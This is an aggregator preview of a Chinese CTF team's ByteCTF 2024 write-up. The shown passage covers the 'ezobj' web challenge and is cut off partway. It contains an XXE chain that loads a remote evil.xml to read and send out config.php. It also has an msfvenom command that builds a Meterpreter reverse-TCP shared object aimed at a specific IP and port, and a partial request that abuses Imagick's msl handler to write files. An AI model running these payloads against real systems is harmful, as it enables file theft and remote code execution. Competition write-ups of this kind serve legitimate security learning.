今天看啥  ›  专栏  ›  山海之关

ByteCTF 2024 writeup by Arr3stY0u

山海之关  · 公众号  ·  · 2024-09-23 12:04
    

文章预览

HEADER 山海关安全团队是一支专注网络安全的实战型团队,团队成员均来自国内外各大高校与企事业单位,总人数已达50余人。Arr3stY0u(意喻“逮捕你”)战队与W4ntY0u(意喻“通缉你”)预备队隶属于团队CTF组,活跃于各类网络安全比赛,欢迎你的加入哦~ CTF组招新联系QQ2944508194 获取题目下载链接请后台回复:bytectf2024 WEB ezobj 读取config.php文件 byte=SimpleXMLElement []=http://xxx.xxx.xxx.xxx/evil.xml []=2 []=1 send.xml "> evil.xml %remote; %all; %send; ]> 写入so文件和一个wmv文件,用msf生成so msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=123.58.220.97 LPORT=42001 -f elf-so -o payload.so cat payload.so | base64 用imagick去写文件 POST /?byte=Imagick []=vid:msl:/tmp/php* =123 =HelloByteCTF2024 HTTP/1.1 Host: ea891011.clsadp.com Content-Length: 1128 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1 Content-Type: multipart/f ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览